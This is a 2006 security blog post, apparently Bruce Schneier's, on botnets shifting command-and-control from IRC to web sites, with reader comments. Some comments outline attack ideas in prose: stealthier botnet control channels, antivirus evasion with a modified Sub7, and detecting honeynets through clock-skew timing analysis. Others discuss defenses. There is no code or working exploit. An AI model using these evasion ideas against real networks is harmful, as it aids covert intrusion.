Hacker-Controlled Computers Hiding Better

If you have control of a network of computers—by infecting them with some sort of malware—the hard part is controlling that network. Traditionally, these computers (called zombies) are controlled via IRC. But IRC can be detected and blocked, so the hackers have adapted:

Instead of connecting to an IRC server, newly compromised PCs connect to one or more Web sites to check in with the hackers and get their commands. These Web sites are typically hosted on hacked servers or computers that have been online for a long time. Attackers upload the instructions for download by their bots.

As a result, protection mechanisms, such as blocking IRC traffic, will fail. This could mean that zombies, which so far have mostly been broadband-connected home computers, will be created using systems on business networks.

The trick here is to not let the computer’s legitimate owner know that someone else is controlling it. It’s an arms race between attacker and defender.

Posted on October 25, 2006 at 12:14 PM24 Comments

Comments

Chase Venters October 25, 2006 12:51 PM

Frankly, I think these bot nets are tremendously low-tech. I’m very surprised I haven’t ever heard of anyone deploying a P2P network as the infection spreads and using PGP-signed commands inserted at any point in the network to control it.

Maybe the real answer is that programmers are lazy, and lazy people do just enough to get by.

Brian October 25, 2006 12:53 PM

It would be possible to set up a command and control system that used only SSL communication to popular web sites. For example, you could use a blog as the rendezvous point, with bot herders posting commands as blog entries and bots posting comments. There might be some scalability problems (could blogger handle comments from 10,000 bots?), but it could be made to work.

I’m not sure what the next move for defenders would be at that point. You can’t block it at the IP layer, because its a major web site with lots of legit traffic. You can’t filter for it, because it is encrypted. You might not even notice the bot at all, unless is starts to generate too much traffic.

It’s a challenge.

sam October 25, 2006 12:56 PM

Followup to the above comment: Mix-in some stenography and you have an interesting channel in play.

Tanuki October 25, 2006 1:02 PM

Another reason for any sensible corporate sysadmin to impose egress-filtering on unapproved ports. Using non-standard ports/protocols is really nothing new: it’s always worth looking at whats going on on UDP/53 and if you’re a backbone you’d be surprised at how much of it is definitely not DNS traffic.

Anonymous October 25, 2006 1:06 PM

@brian, @sam

this could be happening already. it’s virtually undetectable, so how would anyone know?

Bill Mill October 25, 2006 1:10 PM

@Tanuki

What do you mean, another reason to impose egress filtering? I think the point of the snippet is that the viruses are using port 80 to avoid egress filtering. Blocking users’ web access doesn’t seem to be much of a sensible option.

David October 25, 2006 1:16 PM

@Chase

I guess you haven’t read any of the analysis of these “low tech” bot nets. They have some serious command and control features, and most of them don’t phone home back to a central site, they are quite decentralized. Some of them can even change modes of operation if the primary one fails over time.

Ran across one the other day and found that much of the admin of it is simple web forms that then distribute the information. Takes about 5 minutes to send out to the C&C infrastructure a complete change of orders.

Took me 2+ days to get one offending site taken down (hidden iframe with a link to some nasty javascript). The linked site in Korea (with the javascript) is probably still running.

Brian October 25, 2006 1:50 PM

@Chase

Laziness is one of the three virtues of a programmer. The other two are Hubris and Impatience.

Clint October 25, 2006 2:10 PM

Anyone have any good ‘modern’ references on detecting bot traffic in a small business? Most of the stuff I’ve seen is a year or more old and basically says, “use ethereal”. I want to look for traffic from/to current bots. Surely there are tools out there to help spot this kind of traffic? (P.S. I love Ethereal, so don’t get me wrong … I’d just like some better pointers on the type of traffic to look for in today’s environment).

moz October 25, 2006 3:20 PM

@brian

connecting stunnel + htunnel + onion routing of some kind is barely even programming. Someone must have already done it ages ago.

It seems to me, that the survival of creatures as vulnerable as these, suggests that there are no predators in the botnet environment. David’s comment about shutting down one PC (I bet they did shut it down and not try to trace the source either) just backs this up.

I agree with Anonymous; probably more secure botnets do exist. We just aren’t doing enough about the existing ones for their extra security to be an important advantage. When/if we do start to have an impact, bots will begin to evolve. Only at that point are we likely to have enough time to notice the higher level ones. Think about botnets which actively detecat and avoid honeypots for example.

Anonymous October 25, 2006 3:22 PM

Talk about being behind the curve, who recalls Sub7? It still works with a few lines of code changed & defeats every major AV scanner(today), change ports and you have a slave pc that will scan clean and yet its not your pc anymore.. add a changed .dat file to do burst of data @ random times and who would notice?

There was a time when white/black hats were still on the same pages and today the black hats are chapters ahead. IRC? who the F… uses IRC today? But how many pc’s use “chat/im “…. big hole right there isn’t? how about “updates” for AV or Windows? how many home users know what not to allow access to the ‘net? Then you have all of those fileswap programs, whats going on behind the scenes with all that traffic?
How about HTML emails? talk about wide frekin open to attacks. Add a firewall/Av killer thats leaves the icon on the toolbar to fool the home user that everything is just fine…..

Thus we comeback to the owner of the pc, we test users of the highways/roads and yet the damage in dollars via a slave pc is scary if unchecked.Laziness is one of the virtues of a home user.

So how long till the web ask for a license # ?

Anonymous October 25, 2006 5:07 PM

@Chase

http://www.lurhq.com/sinit.html

This one does almost exactly what you describe – P2P protocol on UDP port 53 (fairly easily detectable though, as it doesn’t desguise itself as legitimate DNS). Commands and files may be inserted anywhere in the system, and their signature is checked against an RSA public key.

antimedia October 25, 2006 8:13 PM

I think Bruce’s point is that, as networks continue to tighten up, attackers are moving to the ports that can’t be closed. Their traffic, then, is a part of “normal” traffic and therefore harder to detect.

I think the right approach is traffic analysis. If you see connections of any kind to “strange” IPs, you investigate. If you see repeated traffic to certain IPs, especially when you can’t explain why the particular port is being used (no website at that address on port 80, for example), then you investigate.

As Bruce says, it’s an arms race.

Clive Robinson October 26, 2006 2:31 AM

It is unfortunatly a numbers game and I suspect that the sys admins are going to lose in the long run. First a few assumptions,

1) There will always be one or more protocols used on a network that can be exploited (Protocol weakness).

2) The majority of network protocols in use at any one time will have exploitable weaknesses in their implementations (Implementation weakness).

3) There will always be ways to implement anonymous communications.

4) Laws will not be enforcable in many cases due to political segmentation.

5) There will always be an incentive be it monetry or ego for people to exploit the above weaknesses.

Even if we nail the obvious weaknesses in the first two the number of ways of implementing a covert and therefore anonymous communications channel is way above that that we currently have means to identify.

For instance, it is possible to communicat very succesfully using variations in latency of network packets and other even more interesting types of side channels. I am not aware of any software out there that can even pick up such a system if it uses Spread Spectrum techniques (think about the related digital watermarking if you want to read up on what is possible).

The solution is not to look for the comms you are unlikley to find them except via a honeynet type system.

There are two soloutions to the problem,

A) Do not connect your systems to any communications network that is not fully under your control.

B) You require a reliable (and efficient) method of detecting what is running on each and every computer under your control so that any “unknown” behaviour is picked up.

Although the first method is fairly easy to impliment, the utility of such a network is limited from a business point of view.

As many people know the state of play with regards to Operating Systems and their capabilities in this respect is not that good for the majority of computers.

Therefore I would expect this problem to continue for some time.

Oh and as an aside, it would appear that computers used in Honey nets can be detected by timing analysis of their response to network packets etc. The attack can be easily disgused to look like a “brain dead Script Kiddy” network scan. So it is actually possible for an astute cracker to work out what networks have real service machines and which have fake service machines designed to act as a lure. Therefore they will avoid the Honeynets with their latest exploits in order to improve their shelf life…

As was once said “May you live in interesting times…”

Steve October 26, 2006 4:57 AM

It seems fairly obvious that it is not possible for a zombie computer to perfectly imitate an innocent computer – because if it did, it wouldn’t be sending any spam, or whatever it is that the botherd wants it to do for him. So zombies can still be identified by the fact that they do malicious things, like participating in DDoS attacks, or sending spam. Hiding their communications cannot prevent this, so it seems to me that defenders don’t have to participate in the arms race Bruce describes if they don’t want to – detecting the malicious activity is more robust than detecting the comms. This is (loosely speaking) because there are external requirements on the malicious activity, whereas the comms mechanism is an implementation detail.

If a corporate network is relying on blocking the bot’s comms, then it is already in a world of trouble, because that defence only kicks in once the malicious code has already rooted one of their machines (I say rooted because otherwise a personal firewall would prevent the malware from communicating out at all, and there would be no need to block comms at the network level).

Comms-blocking defends you against “zombification”, but not against attacks designed to damage or steal your data. If vandal-style trojans can delete your data and take down your machines, then participating in a botnet may be the least of your worries. I’m assuming that vandals are still a significant part of the security threat landscape, which may be a mistake.

The problem here seems to be that one layer of a deep defence is failing. As always with deep defences, if the failure of one layer is the difference between security success and security failure (the article suggests this by saying that the reason there aren’t zombies on corporate systems already is that IRC is generally blocked on corporate networks), then you’ve left it too late to worry about…

The response to the inability to block botnet commands, from the POV of corporate IT, doesn’t need to be to improve the ability to detect botnet communications. They could instead improve (or invent) other layers in the system.

Steve October 26, 2006 5:00 AM

@Clive Robinson

“Therefore they will avoid the Honeynets with their latest exploits in order to improve their shelf life…”

Is this just a theoretical defence against Honeynets, or has it been demonstrated in principle / observed in the wild?

Clive Robinson October 26, 2006 7:52 AM

@steve,

“Is this just a theoretical defence against Honeynets, or has it been demonstrated in principle / observed in the wild?

Has somebody done it and shown it to work on a limited network yes.

Have they written up a paper about it no (though they might I will have to check with them).

As for in the wild, I am not sure anybody has gone looking for this class of attack yet.

By the way it is a series of attacks not just a single attack. They are variations on different “Side Channel” attacks based on using the available timing information from the target machine, both time stamps and other visable effects in timing.

I will describe one attack which will work just about from anywhere on the Internet to a Honynet machine which has multiple OS’s and IP addresses hosted on it.

First I will give you the background on it so you can find the info to Do It Yourself as it where,

About a year and a two thirds ago Bruce bloged about “Remote Physical Device Fingerprinting”

http://www.schneier.com/blog/archives/2005/03/remote_physical.html

The artical on which it was based is available from,

http://www.cs
e.ucsd.edu/users/tkohno/papers/PDF/

At the time I commented that,

“This “attack” is a form of tempest attack, and the old addage about the information “energy and bandwidth” apply. Interestingly looking at their paper they have missed a couple of things that might provide more information about the computer. Basically the resonant frequency of an Xtal oscilator is decided by the elctrical and physical charecteristics of the circuit. These means that the frequency changes with the applied voltage, temprature, mechanical vibration. So it there is sufficient bandwidth in the time detection method it might well be possible to tell things about the environment the laptop is in and how much it is being used (heavy calculation take the temprature up and drops the powersupply voltage slightly).

And also a couple of sugestions for a quick hardware fix. From which you can see that I had given some thought to the problem. One item I did not realy go into further was,

“heavy calculation take the temprature up”

This was independently taken up by a couple of people at Cambridge Labs and they developed into an attack against Anonymous servers such as TOR’s in their paper,

http://www.cl.cam.ac.uk/~rnc1/anonroute.pdf

Although they considered the use of systems with two IP addresses in the box they did not expand on the idea any further.

Well one of the problems with Honeynets is the need to look real, in a cost efficient manner as well as having the machines not send uncontroled data out to the Internet.

The easy solution is to host multiple OS&IP’s on a single host or to use an OS that responds to multiple IP addresses. The box has one or more network cards that are on the Honeynet. The box is also unused by a real user to address the Internet traffic from the box issue this is an important issue as a new attack might only be visable after it has worked and is starting to send requests back to the Internet.

Well on such a machine the one thing that remains in common is it’s system clock or XTAL any drift in this is identicaly observable on all the IP addresses and network cards.

As a Cracker all you need to do is get the timing information from a range of IP addresses on the target and cross corelate them with each other. Those that show identical skew or other effects are with high probability the same machine.

If there are just one or two IP’s with the same skew in a range of IP addresses then it might be a real working network, in say a software development environment.

However if there are a significant number then there is a reasonable chance it’s a Honeynet or other similar network. As a “wiley Cracker” you will treat it like a bag of snakes and go somewhere else.

You can do other types of timing attack to achive similar results.

You can also use the same technique to identify individual machines behind certain types of load sharing system.

Why would you want to do this well imagine you are a small company using a Hosting Company to put your web site up. You write secure web code and do reasonable testing so not realy a problem.

However the hosting company to better utalise resources puts several other web sites on the same box and they might not be as secure. Even if they say they don’t/won’t at some time or another there is a chance they will just to maintain service. Several hosting companies are known to do this when there are “technical difficulties” in order to maintain continuation of service and avoid taking ASL penalties (often it’s in the paperwork right down in the fine print).

A Cracker might then be able to find a poorly written web site on the same box as your web site, and get a toe hold into the server box, then escalate their way into your secure web site to get at your data or other information.

Clive Robinson October 26, 2006 8:04 AM

@Steve,

I forgot to mention, in the papers I gave links to the implication is that you have to do a lot of timing to get reliable data. That is true for the attacks they outline.

However for the attack I have outlined you are cross corelating timings against each other. You will need a lot less data to give you an indication as small changes appear on all the IP addressess at the same time.

So in practice you launch what appears to be a Brain Dead network scan against your chosen target and go away and do your cross corelation at leasure, then go back and do it again in a more stealthy manner to check your suscpicions.

Most Honeynet operators are going to ignore a brain dead network scan as being by a “script kiddie” and not worthy of interest…

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.